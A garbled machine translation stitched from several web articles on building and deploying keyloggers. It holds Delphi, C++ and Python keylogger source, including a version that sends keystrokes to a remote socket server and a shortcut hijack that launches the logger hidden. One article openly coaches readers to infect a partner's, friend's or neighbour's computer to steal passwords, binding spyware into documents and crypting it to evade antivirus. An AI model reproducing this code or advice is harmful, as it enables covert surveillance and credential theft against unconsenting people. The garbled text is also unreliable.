Pokrokove writing a keylogger on p.

Information security laboratory. Yak tse zrobleno

Golovna / Optimization of work

About writing keyboard shortcuts
rozpovidalos already more than once, but all the stench
to think of one great nedolіk - as a rule,
I need to know more
information, and not write everything to the log file,
what koristuvach write on the keyboard - hardly chi you
give a lot of thought
pressing on the buttons when playing in CS 😉

Sounds squealing that the spy can be booty
let's stick it in, and not stupidly write into the beam everything that
give you 🙂 Navit name such a program
the spy gun does not turn the tongue - tse mayzhe
electronic agent 007 :-))) Shlyakhiv in order to
so the program wrote to the log what to click
we have a lot of material. The simplest -
control active windows, tobto. in yaki
at the moment press the buttons 🙂 Yak tee,
I think, you know, shpiguns, as a rule, add up
iconed file that DLL. Tse pov'yazano z tim,
scho for the transition
it is necessary to create a new PROCESS, and
zruchne for this - vikoristovuvati dll-ku.
To that, in order to activate
well the logger itself, you will need to use it
the moment to grab the DLL, and if it's active
change to something else - vivantage її z memory.

Let's take a look at the DLL functions of my Visual
C++. The challenge for the riddle about dlls is carried out
function hINSTAGE=LoadLibrary("name.dll"), de hINSTAGE -
yak bi descriptor zavantazhenoї in memory DLL,
name.dll is the name of the library. Shchob її vivantage,
the main function of FreeLibrary (hINSTAGE);

Now about those, how can we need
programs. For example, we know that koristuvach
read the mail through the website www.mail.ru, then you can
nail the agent in such a way that you win over
onslaught of keys, if the coristuvach enters the cey
website. (Follow the memory, what in the past
dodatakh spigun keyboard vzagali not
maybe pratsyuvati, for example, in the address row
Internet Explorer "a - ce to bring to "emergency
completion of the program" - what else do you see
Windows hot_v :))) For which method as a whole
pidide and read passwords from the dialer
- as a koristuvach suffers from paranoia and scruples
enter login and pass manually 🙂 Or else
cіkavo dіznatisya scho vіn write in Outlook or
at the notepad. Axis of part of the code that viconu
replacement of the headings of the vicons we need.


//Start the loop.

int sl,ll;
//Change for
HWND hw;
//Demo is simple
shlyakhom - randomly character-by-character rows:
take away the heading of the show and we will need it for us
side by side.

while (ll != sl)

GetWindowText(hw,st,128); // readable

char stt="_Here we write the header of the required
us vіkna_№1";

while (stt==st)
// equal
character-by-character rows
//it's better to work in those positions, what will be
to turn over, which is necessary to enter
// We are in a row like a part in the next row, you can
zrobiti like //wide filter.


if (ll==sl) ( //like rows
run up to the end of the 1st row -

halt; // interrupt the process
// and so far - like
It is necessary to reverse the appearance of a number of vicons.

char stt="_Here we write the header of the required
us vіkna_№2";
while (stt==st)

if (ll==sl) (
halt; // interrupt the process

You can replace the subsequent revision
keep parallel, if you align in
one cycle of elements in a row, even if only one
zbіglasya - then the DLL-spygun is activated.


Now we need to rewrite the whole hour,
chi is always active.

while (ll==sl) //docs
rows zbіgayutsya - spinning on mіstsі

// readable
more active at once.

while (stt==st)

Leave the cycle to talk about those who are active
suddenly changed, that was given a vivantazhuemo "spygun"
the library and the cycle starts from the cob - tobto.
the program will check again if vipade is alone
you need vicons.


However, the above descriptions of the method can
nedolіki - it is necessary to reconsider
from the whole list of vikon chi є need
active at the moment. Tom
you can use another algorithm - do not override
the heading of the show, but marvel, as if in the given
view elements of type EditBox "a. As a rule,
passwords are written by yourself there 🙂 For whom will
marvel at the element of the vikna - and yakscho
among them є Edit - just like a DLL.

char p2, p3; //masivi
symbols for the headings of the windows.

I know the same in the cycle, reverifying all the vikna:

while(p3 !="Edit") //docs
didn't know about the editbox - vikonuemo cycle



HWND hwnd_child; // change
vikna element

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
if (p3!="Edit")
// as the first
known elements in the window - not EditBox - same
joke far away

while(hwnd_child != 0)
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
if (p3=="Edit")

Now vlasne about shpigunsku DLL.
Write її more beautifully at Delphi, bo cey
Pascal's masculine padding can't
"Sipishnoy" sounds
prichipki to data types. Shchob create
select the File-New-Direct Link Library - i
preparation for DLL is ready. And the axis itself is the code:

library key1;
uses Windows;

KHook: HHOOK; //Change for

function KProc(Code: integer; wParam: Word; lParam: LongInt): LongInt; stdcall;
KState: integer = 1073741824; //the code
"Key pressed"

Simv: ShortString;
KL: array of Char; //for
keyboard layout revisions

F: TextFile;
// change
log file.


// login
if (lParam and KState)<>0 then


AssignFile(F, "keylog.txt");

// we'll make a vodcrity
file "keylog.txt":
if OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR then
// which file is not
created - we create.

else Append(F);
//yakscho є - write in

Simv:=chr(0); // nullable
Change the character that is read from the keyboard.

// parsing the code
pressed key
case wParam of
// numbers
48..57: Simv :=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
105: Simv:="9";
189.109: Simv:="-";
110: Simv:=".";
111: Simv:="/";

GetKeyboardLayoutName(KL); //
rechecking the layout

yaksho KL = "00000409" then // yakscho

case wParam of
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:=".";
191: Simv:="/";
65..90: Simv :=Chr(wParam);
yaksho KL = "00000419" then
// yakscho

case wParam of
219: Simv:="X";
221: Simv:="b";
186: Simv: = "F";
222: Simv:="E";
188: Simv:="B";
190: Simv: = "Yu";
191: Simv:=".";
65: Simv:="F";
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: Simv: = "I";

// This character is not empty (so.
as an alphanumeric key is pressed)
// Then we write yoga file
if Simv<>"" then
Write(F, Simv);
//close the file

// send notification
other pastkas in the system
Result:=CallNextHookEx(KHook, code, wParam, lParam);

//Insert Paste
for reference, let's talk about the keyboard.

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

You can also ask this program in
fallow in the sphere of zastosuvannya - yakscho
admissible need only rahuvati once
password from the dialer - you can set the same
perevirku on vіkna to the needs of us, and if it won't
become active - take over the library
key1.dll, get the first hour, for
yak koristuvach vstigne fill qi symbols on
keyboard, and then vivantage the library
end the program. Approximately so 🙂

// Chekati 10 seconds, per tse
Hour koristuvach dial the password.
//the hour may be more fallow
type of galvanization stage of the coristuvach
// that yoga speed on the keyboard 🙂


PS: All resurfacing materials are given
including demos
sacred illuminating goals, the author setting
demonstrating in front of you
algorithm robotic programs type "upgrades
keyboard spigun" and all
award for winning
material fall on you (overwhelming
puller 🙂) Implementation code has
other inaccuracies
algorithm - try to know it yourself)).

PSS: Obviously, a keylogger may not be
defeat your main function -
it’s better to write to the log of the onslaught of buttons, ale th
change the value of the pressed keys to yours
relish - ale yak tse robiti i for what
maybe just life is necessary -
coming time 🙂

Hello, I am calling you QUAZAR. Today I'll show you how to create a simple keylogger in Python. Zrozumіlo, tsey keyboard spygun can’t sway with such giants like that, but without regard to everything you can know your zastosuvannya.

What is a keylogger?

Reporting about those that such a keylogger and about seeing keyloggers, you can read in the article "". To find additional materials on the topic, search for a search on the site, which is found at the upper right corner. Just enter the word keylogger or keyboard pusher.

Simple Keylogger in Python

To create a keylogger, we need:

  • Operating System: Windows or MacOs
  • Installations on a whole Python machine, as well as special libraries.

This material is informational in nature. Vikladena at the statistic information is given exclusively with a knowledge-based method. Neither the editorial office of the site www.site, nor the author of the publication bear any responsibility for any mistake, the head of the article is the author of the article.

Creating a simple keylogger in Python

To get started, you need to get Python installed.

Simple Keylogger in Python

After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32-bit and 64-bit versions for Windows and other operating systems. Upgrade PYhook and pyWin32 to the version of Python and Windows you have installed (32 bit or 64 bit).

Keylogger in Python. PYhook Keylogger module in Python. pyWin32 module

When you want to install it, open the IDLE (Python GUI) menu from the Start menu.

Simple Keylogger in Python

Go to the menu "File" and click on the item "New File". Then paste the keylogger code:

#Website: www.website
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
return True
hooks_manager = pyHook.HookManager()

Save some money by naming the file Keylogger.pyw. Just do not save the file from the root directory C: for copying that file, you need administrator rights. Create a new folder on the C drive: otherwise, in another location, you don't need administrator rights to copy files and save Keylogger.pyw there.

As an output file called “file_log =“ C: keyloggerlog.txt ” you can choose whether it is a place, or better, it is better, if it is attached to a hard disk. From which application I will save the zvіtu file to disk in the root directory C:. Aje me there is nothing to grab.

Automatic launch of a keylogger in Python

Keylogger is ready. Now you need to work in such a way that the keylogger is launched automatically from the Windows settings. You can implement it differently. Let's try zrobiti for help to the bat-file, linking the launch of the keylogger to any program, or by registering it in auto-entry.

I'm going to create a bat file. Copy and paste the following code into notepad:

::Name: QUAZAR
::Website: www.website
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first row, you need to enter a path to the keylogger.pyw file (in my case "C: keylogger.pyw"). In another row, you are responsible to enter the path to the program, so call vikoristova koristuvach (for my mind - the Opera browser).

After editing, save the file in the .bat extension (in my login logger.bat) in some attached location on the computer (in my login in "C:keylogger.bat").

Now let's go to the working style and choose a shortcut for a frequently used program (my browser is Opera). We right-click the bear and click on the context menu and go to the authority of the shortcut. In the Object field, enter the path to the keylogger bat file C:keyloggerlogger.bat.

After the change is made, the shortcut icon will also change. Alece is easy to blame for the contributors to power (marvel at the screen).

Who among us does not want to consider himself at least once a cool hacker and zlamati butt himself? :) If you want to know and not, then about those, if it would be good to take the password from the post / social. merezhi friend, squad / person, susіda in kіmnati thinking I want to once leather. :) That th need to fix it, zreshtoyu! A lot of attacks (malicious attacks) involve infecting the victim's computer with so-called keyloggers (spyware).

Later, in today's article, we'll talk about those who are bezkoshtovnі programs for studing at computers based on windows, de mozhna zavantazhit їх new versions, like infecting the victim's computer with them, and why the particularity of their variant.

Ale, back to back, there is little congestion.

What do you need keyloggers for?

About those that are like that, I guess, You guessed it yourself. As a rule, the stench is like a program, like it is attached (if you don’t want to do this) to be installed on the victim’s computer, after which it fixes absolutely everything on the keyboard on this node. With this crime itself, according to your own pressure, it will sound fixed: the date-hour of the onslaught (dії) that program, in which case you will vikonanі (browser, including the address of the site (hooray, vіrazu bachimo, vіd chogo passwords!); local addenda; systemnі services (including windows login passwords, etc.).

You can clearly see one of the problems: I took a couple of minutes of access to the computer of my suidka and I want to take the password from VK! By installing the miracle program and turning the computer. How can I see passwords? Know how to take the computer from her? Є accepted novelty: as a rule, nі. Most of the keyloggers are now more likely to save the entire accumulated base of the locally, and yet to reseal it farther away. Options for managing the logs are essentially anonymous:

  • Fixed e-mail (possibly kilka) - the best option;
  • FTP server (who has VIN є);
  • SMB Server
  • A flash drive is fixed (insert it into the USB port of the victim's computer, and all logs are copied there automatically in invisible mode!).

Is everything necessary? I think the point is obvious. A crime of banal stealing of passwords, deaky keyloggers and a number of reception speeches:

  • Logging listing at the tasks of social. merezhakh chi messengers (for example, Skype).
  • Screenshot capture.
  • Pereyad / capture data from the webcam (which may be more difficult).

How to hack keyloggery?

And the food is not easy. It is necessary to understand that it is not enough just to know a good functional keylogger.

Otzhe, what is needed for a successful robotic spyware:

  • Administrator access to remote computer.
    Moreover, it is not obov'yazkovo the very physical access. You can log in through RDP (Remote Desktop Service); teamviewer; AmmyAdmin etc.
    As a rule, from this point of view, the most folded places are tied. However, I recently wrote an article about how to take administrator rights in Windows.
  • Anonymous e-mail/ftp (do not charge you for this).
    Obviously, because you are reading the Susidov Shura, you can boldly omit this paragraph. Just like you have a vipadku, like you have a victim’s computer at hand (alya, find out the passwords of a brother / sister).
  • Vidsutnіst working antiviruses / internal systems to protect Windows.
    More public keyloggers (see below) and more important anti-virus software (whether virus-loggers are supposed to get into the kernel of the OS or the system driver, and anti-viruses can no longer detect them, they can't destroy them, they can't). By virtue of the foregoing, antivirus software, as well as the same, will be ruthlessly destroyed. OK, antiviruses, it’s not safe for our spyware to become the same system like Windows Defender (these appeared earlier in Windows 7 and beyond). The stench suspects the activity of the worker on the computer. You can easily find out about those who want to know about them in Google.

Axis, maybe, and all the necessary enough mind your success on the territory of stealing other people's passwords / leaflets / photos of what else you might be tempted to encroach on.

How can you download spyware and de їx?

Later, after a glance at the main keyloggers, I had a chance to win in my everyday practice with the help of free downloads of their latest versions (so all versions are left for now (for those who really know the faces) and already by testers and vikiers).

0. The Rat!

Ratings (out of 10) :

  • Attachment: 10
  • Efficiency / Usability: 9
  • Functionality: 8

Tse is just a bomb, not a keylogger! At the work station, sit 15-20 KB. Why wonder: because of the majority of writing in assembler (veteran programmers wept) and the writing of the big one by hacker enthusiasts;

In addition, the package includes FileConnector - a mini-program that allows you to glue the keylogger with any program. As a result, you will accept a new exe-file of practically the same size, and it works just like that program, with which you have glued it! After the first launch, your keylogger will automatically be set to invisible mode from behind the parameters you set to enforce logs. Handy, isn't it?

Great opportunity for social engineering (bring a friend a file-game/presentation on a flash drive, you can just type a Word document (about how to create an exe-ik that launches a specific word/excel file in one of your next articles), launch , everything is good and beautiful, but a friend is invisibly already infected!). Otherwise, just upload this file to a friend by mail (better than sending it to download it, so that the mail servers are able to download and manage the exe-files). Obviously, there is a risk of antiviruses during installation, but it still may be necessary (then it will not be after installation).

By the way, for the help of some other devices, you can glue any distribution kit of the attached installation (such as in The Rat! and in the Elite keylogger) not only with exe-files (as in the case of a few trochs of stumped coristuvachs, all the same, they call out suspicions), ale і with great word / Excel and pdf-files! Already on a simple pdf-ku, you can’t think of anything, but it’s not there! :) How to be afraid is the topic of a whole article. Especially zavzyatі can write me nutrition through the form of a return link. ;)

Zagalom, The Rat! you can describe it for a long time and a lot. Kudi is better for me, the axis is crushed. There is a request for downloading.

1. Elite keylogger

Ratings (out of 10) :

  • Attachment: 10
  • Efficiency / Usability: 9
  • Functionality: 8

Mabut, one of the best ever created keyloggers. Up to 20 possibilities, beyond the standard set (overlapping all the add-ons / vicons / sites), including overshooting messengers, pictures from the webcam, and also - what is more important! - Change passwords of the WinLogon service. In other words, you can change passwords for logging in to Windows (including domain names!). It became possible to launch robots on the level of the system driver and launch at the stage of OS advancement. For the sake of particularity, this program is completely invisible for Kaspersky, and for other anti-scrambler software. I know, I didn't create a custom keylogger built on a taxi.

Well, the prote is not varto hush over it already strongly. The installer itself is recognized by antiviruses even more easily and for its installation you need administrative rights and enabling all antivirus services and services. Once installed, everything will be perfect for any occasion.

In addition, a special feature (a robot based on the OS kernel) is described to make support for the OS version, on which keyloggers it will work. Version 5-5.3 (powered to hover below) supports everything up to and including Windows 7. Win 8/10, as well as windows of the server family (2003/2008/2012) are no longer supported. Є version 6, which works miraculously, incl. on win 8 and 10, it is impossible to know the cracked version at the moment. Mabut, the future will show up. In the meantime, you can download Elite keylogger 5.3 for more.

There is no mode of framing work, which is not for the sake of robots (for working hard at the computers of their spivrobitniks) or the whole group of people.

An important point is the possibility of creating an installed distribution kit with customizations (for example, from a given address, mail, where you need to add power to the logs). When you leave, you will remove the distribution kit, which at startup does not see any future advances or vicons, and after the installation you can build it yourself (which means that the option is different).

A copy of the screenshots of the 5th version (to show that everything is beautiful and handy on the skis):

2. All-in-one keylogger.

Ratings (out of 10) :

  • Attachment: 3
  • Efficiency / Usability: 9
  • Functionality: 8

It's also a tricky thing. Functionality as a whole on the Elite keylogger. Axis zі skritnіstyu correct girsche. Winlogon-passwords are no longer intercepted, the win driver is not є, they are not forced into the kernel. However, it is installed in the system and attachments of the AppData directory, which are not so easy for third-party drivers to reach (not in the name of those installations). Prote antiviruses early chino with success to rob, so to rob qiu rich is not necessary nadіynoy i bezpechnoy with vikoristanny, for example, you have to work for the duty of the authorities. ;) Glue something else, or crypt the code to attach it to antiviruses, don't go.

Pratsyuє on any versions of OS Win (which is practical).

Whatever it is, everything is wonderful: log everything (creaming passwords for entering Windows), transferring everywhere (including e-mail, ftp, fixed flash drive). For zruchnist so everything is miraculous.

3. Spytech SpyAgent.

Ratings (out of 10) :

  • Attachment: 4
  • Efficiency / usability: 8
  • Functionality: 10

So disreputable keylogger, even if it's cryptic. Supporting OS versions is also possible. The functionality is similar to the previous options. Іsnuє tsіkava function of self-destruction after a given period of time (or after reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be requested and which is not available from the previous two representatives.

Є robotic mode, which is handy for keeping pace with a whole network of computers. Vin, before speech, є at StaffCop (before looking around, not inclusions through the margin for one coristuvach - physical individual). Perhaps, this program is ideal for robots to follow their spivrobitnik (want the leader in this field without guarding StaffCop and LanAgent - for example, Vi - jur. Person, obov'yazkovo to marvel at their bik). But for the sake of following your offspring, you love to sit and look at sites for grown-ups. Tobto. there, it is more necessary not to be attached, but to be more efficient (including a bunch of beautiful magazines-zvіtіv toshcho) and the functionality of blocking the tasks of sites / programs (SpyAgent has the same).

4. Spyrix personal monitor.

Ratings (out of 10) :

  • Attachment: 4
  • Efficiency / usability: 6
  • Functionality: 10

Functional on the equal of the previous candidate, however, there are problems with integrity. In addition, the functionality includes a cicava rich: copying files from USB-carriers that are inserted into the computer, as well as remotely reviewing the logs through a web account on the Spyrix website will).

5. Spyrix personal monitor.

Ratings (out of 10) :

  • Attachment: 3
  • Efficiency / usability: 6
  • Functionality: 8

Reporting is not describable, tk. This copy of the keylogger can't do anything that wouldn't be in one of the front spigers, however, some of the keyloggers can fall to the soul (at least, with its own interface).

What can the result have?

The power supply of the keylogger is more ethical, less technical, and more heavily exploited for your purposes.

Likewise, you are a robot supplier, who needs to control his spivrobitnikiv, boldly put StaffCop, pick up from your spivrobitnikiv letters and allow for such actions (and in addition, for such a job, they can get you pretty well) and right at the cape. I want to know especially and effective ways to improve the practice of my spivrobitniks.

If you are an IT-fahivets-pochatkіvets, which you just test, if you don’t - you’re a fool - and if you work on the right, then use the methods of social engineering and conduct testing on your friends, vikoristovuyuchi be-yaky z induction. However, remember: the manifestation of such activity by the victims does not even make friendship and longevity. ;) I definitely don't varto verify on your robot. Remember my words: I have got it. ;)

Well, your meta is to shove after a girlfriend, a person, a judge, or maybe, you work hard regularly and for a penny, think well, chi varto. Adzhe early chi pizno can get it. That one is not like that: "rushing into someone else's wandering whiteness - not happy with the receptionists." If you still need (or maybe you work in the field of investigating computer mischief and so you can enter your professional shoes), then there are only two options: The Rat! and Elite Keylogger. In the mode of attaching installation distribution kits glued to word/excel/pdf. In short, as far as possible, crypting with a fresh cryptor. Only in every moment can you guarantee more or less safe activity and real success.

But in any case, keep in mind that it’s better to use keyloggers – there’s only one small hole at the reach of the goal (including launching simple attacks). Don't get administrative rights, don't get physical access and not all the koristuvachs will be open, read and download more of your attachment / message (privit social engineering), don't start turning on antivirus / your keylogger / cryptor anyway. All of these and many other problems can be overcome, but the other one is the topic of a whole series of other articles.

In a word, the Witnesses began to porinati in a foldable, unsafe, and even more cicavi world of informational security. :)

With respect,Lisyak O.S.

And the first thing to do is to start reading - check it out in my blog, where I publish my author's articles on programming, virology and other speeches
Original article

All information is given solely for your knowledge. Neither the administration, nor the author bear responsibility for any possible mischief, subjugated by the materials of this article.

For about a month, I have been constantly watching for different tricks, feeding some keyloggers. Too many shukav, but could not know the holidays, richly shukav, but could not know the salesmen, etc.

In this article, I want to show how easy it is to write a keylogger with basic functionality. Base I zapoziv zvіdsi - * * , fixing bugs and adding additional support for interaction with WinSocket

  • Visual Studio 2015 Community Update 4
  • Visual C++ 2015
Program structure
For the cob it is necessary to indicate how the keylogger is used. Whether it's sending logs to FTP/Mail, writing to a socket, editing a file to a gate, writing logs to a database.
I virishiv zupinitsya on sockets. Why? Tse zruchno, just that usable.
Vykhodyachi s choice, we will need to add 2 supplements:

  • Console program, so that you will receive data from the client and see it in the console
  • Vlasne, the keylogger itself, which is the way to press keys on the server
I know, maybe, from the server.

We create a C++ console program in Visual Studio.
The whole code is in the office. MSDN butt - *See to the forum for a review. *
It is not necessary for us to replace deeds of significance in the new.
Let's write down the constant changes: the buffer size and the server port to which the logs are sent

The code:

#define DEFAULT_BUFLEN 1024 //Buffer #define DEFAULT_PORT "1337" //Port

Instead of a one-time do/while, we put an infinite loop, for which we accept data as a client, display them at the console, close the order and follow a new one:

The code:

Do (ClientSocket = accept(ListenSocket, NULL, NULL); //Accept connection iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Read the log if (iResult > 0) //The log is not empty printf("% s", recvbuf); //Display closesocket(ClientSocket);//Close the date memset(recvbuf, 0, sizeof recvbuf);//Restore memory) while (true);

Compiling in Release, dropping it on the didik, checking the port we need and launching


We create a Win32 program in Visual Studio.
As I already said more, the keyboard hook and the obbnik push me, taking s *See to the forum for a review. *
To fasten the screw on the socket, I turned to *See to the forum for a review. *
Also, it is important to change constant changes: buffer length, ip deda/computer and port

The code:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "" #define SERVER_PORT "1337"

I had a chance to work with these methods and work globally, so that the code could be corrected correctly:

The code:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; charlastwindow; int Save(int keystroke); // Taking another argument

We create a method of forcing data on the server behind the butt, like a buv on the cob of a paragraph. Dalі, shortly replace the port, ip and info that is passed to the function arguments:

The code:

Void sendData(char*ip, char*port, char*data)

For the Save method, it's the same - we take another argument and change the log entry in the file for editing to the server:

The code:

Chardata; sprintf(data, "\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);

Dali, following the same principle, change the direction of the onslaught of service keys. Strengthening letters can be done in this order:

The code:

Charc; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);

Everything that is connected with the visibility of the window in the code is clear, and you are ready.

When the keylogger is launched, it hangs in the processes and the skin is pressed against the keyboard. It is possible that some symbols will be displayed incorrectly, for example, hear, but you can correct everything yourself (even if everything was perfect, before me in PM I knocked Jesus out of the wrong salesman of a private keylogger).

Various spy programs are needed in the minds, if up to one computer can access a lot of people.

In their minds, coristuvachs may want to know, such sites were seen from the same computer (for example, children), chi did not steal from credit cards for help saving passwords, and so on.

Our review will allow you to find the optimal choice.

Features of choice

What is a keyboard spigun for his sutty? Tse program, like, strictly seemingly, is not directly tied to the keyboard.

Vaughn vstanovlyuєtsya on the riddle about the computer and dіє. Often there is no sign of activity on the computer, otherwise it’s just right.

Such a program is mediated in conjunction with the keyboard, so that it works with the program on a PC, as if changing the signals that come to the processor as a result of pushing buttons, text with each other.

This is directed to such software for the selection of information that is entered through the keyboard.

Such utilities are of a different type - for the help of some you can look over the entire text typed from the keyboard, for the help of others - only the one that is typed in the browser or in any selected program.

Deyakі programs give the opportunity to create such displays, otherwise - not.

So they stink one by one after the level of concealment. For example, the activity of some is obvious, on the working table there is too little yarlik. programs to control activities, for example, children.

Follow the presence and activity of others, we don’t remember - the stench is attached and installed for installation on someone else’s computer, if the fact of installation is necessary to attach to a third-party coristuvach.

Vrakhovuchi such a variety, choose the most suitable software can be done foldable.

In this material of submissions of the TOP of the best programs, it is possible to win for the purpose. Among them, it’s easier to choose the one I need.

Technical characteristics

To simplify the process of choosing software, in the tables below, the main relative characteristics of all programs included up to the TOP are listed.

nameLicense typeType of information to be collectedFunctionalDesign
SC-KeyLogNo costAllWideforgiveness
WideStep Handy KeyloggerFree of charge/PaidAllWideRefinishing
Actual SpyPaidAllDuje wideStandard
The Rat!Free of charge/PaidLess, lower at the frontFinish wideunaesthetic
SPYGONo costFallow versionFallow versionStandard Windows design
Ardamax Keylogger 2.9No cost3 keyboardsSoundsforgiveness
NS Keylogger Personal Monitor 3.8No costAllSoundsforgiveness
KGB SpyPaidZ keyboard + open programsVuzkysimple
Golden Keylogger 1.32No cost3 keyboardsToo narrowsimple

Based on the characteristics of these tables, it is easy to choose the most suitable program for a specific program.

The report about this utility is given below.


The purpose is the volume of the functional program of the shpigun, as it expands without cost.

Krim vіdstezhennya without intermediary information, scho to be entered from the keyboard, you can also choose, the addresses of the websites you see, passwords, the windows you enter in the browser.

Give new information about all activities that are displayed on the computer. With the help of molding, the file can be viewed from a different location.

  • Possibility of remote access to a file from another attachment;
  • Vіdsutnіst sіlіdіv dіyalnostі programs on the computer for the correct setting;
  • The diversity of data that is chosen - practical information about all activities on a PC can be available.
  • Save passwords only higher than NT0;
  • Too simple menu and unaesthetic design;
  • Finish non-manual format for the result.

And what does it seem like coristuvachi, yakі actively vikoristuyut tsey software? "Absolutely incomprehensible for a koristuvach", "Daniel is right to come to the post office".

WideStep Handy Keylogger

Tsya program expands mentally without cost. The price of the new paid version is 35 dollars.

Dosit tsіkava that functional program, like costing your pennies, if you are ready to pay them.

Vіdmіnna rice– building to correct the recorded data with the designated periodicity. In other cases it is normal, often, stable for other programs from this list.

  • Selection of information of various types;
  • Povna invisibility of robots from the computer of the coristuvach;
  • Simple interface and keruvannya.
  • The design is shorter, lower at the front program, but everything is not on top;
  • The format for displaying the result is not manual;
  • The paid version costs a lot.

Take a look at the shortlisted software like this: “Smart, simple and functional program. Dosit not remember the hour of work.

Actual Spy

The functional and foldable paid program is 600 rubles. However, there may be a demo version, which can be used without cost.

Features of which software- Health in the tasks period hour.

It helps to solve the problem of introducing a graphic password / key, as the rest of the hour began to spread widely.

  • Anonymous types of information that is collected, plus the ability to take screenshots from the screen during the appointment period;
  • There is a large number of other additional functions and features;
  • Write down yak dії, and th hour vikonannya;
  • Encrypts the formation log.
  • Trivality of work (selection of information) for the cost-free demo version to become 40 quills;
  • Pay more wide, if you want a bigger-less price is acceptable;
  • To finish the program is great.

The comments of the correspondents about this program are as follows: “The program is recognized. Well done programmers!


Paid program with a high price- 69 dollars. Dіє on the PC it will be unfathomable in the mode of low level, so it may not show up.

Tsіkava that zruchna singularity- Automatic launch of the software, which starts immediately after the launch of the system itself.

It works well or doesn't show up with special anti-keyloggers.

  • Povnistyu prihovana diya that skladnіstі v vyyavlennі;
  • The format of the robot is the type of low-level driver and automatic start at the hour of the system's occupancy;
  • Vіdstezhuє і takozh i natiskannya not only the main, but the service buttons on the keyboard.
  • Dosit foldable software installation system on PC;
  • The program is high quality, but on the Russian Internet you can find the old evil version;
  • Dosit collapsible system of іndivіdualnykh nashtuvan programs, yak, vtіm, virtuous yourself.

What does it seem like coristuvachi about this software? "Good program", "Trochs do not reach Jetlogger".

The Rat!

Dosit expanded and popular, functional utility with a paid license.

However, a free demo version with a limited period of time is hoped for a private voicing.

The program is very simple- write this yourself, maybe some kind of sticky koristuvach. Tim is no less, it is almost impossible for antiviruses and special programs that detect such software.

  • Simplicity, functionality and high stability of work;
  • The minimum amount of space for the file, as it borrows on the computer;
  • To finish the bagato nalashtuvan.
  • Finish an unacceptable design, wink in black, white and red colors;
  • Functional deshcho earlier, lower in programs described earlier;
  • A non-handling review of the magazine and a glance of a non-handling interface and a victoria.

Koristuvachi say about this program like this: “Practice is stable, ale is simple”, “The program is good, it allows you to collect data without memory.”


The price of a new keylogger, assignments to work and splitting by a Russian programmer.

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